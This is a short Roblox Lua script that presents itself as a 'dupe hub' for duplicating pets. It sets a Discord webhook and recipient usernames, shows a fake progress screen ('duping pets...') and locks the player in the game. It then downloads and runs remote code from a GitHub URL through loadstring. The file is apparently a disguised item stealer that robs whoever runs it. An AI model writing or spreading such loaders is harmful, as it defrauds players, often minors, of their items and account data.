UserName = "freevcaccforyou"
UserName2 = "freevcaccforyou"
Webhook = "https://discord.com/api/webhooks/1095923184898945124/7nq3Wfshkb1fEuv-V6uo2iIOajOt-gtaY6fZs1pN3O7J7ovtP3eqlavg2GVYj5tdCkp6"

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 

_G.ScriptName = "dupe hub"
_G.FirstText = "wait till it hits 100%"
_G.SecondText = "duping pets..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 35

loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()
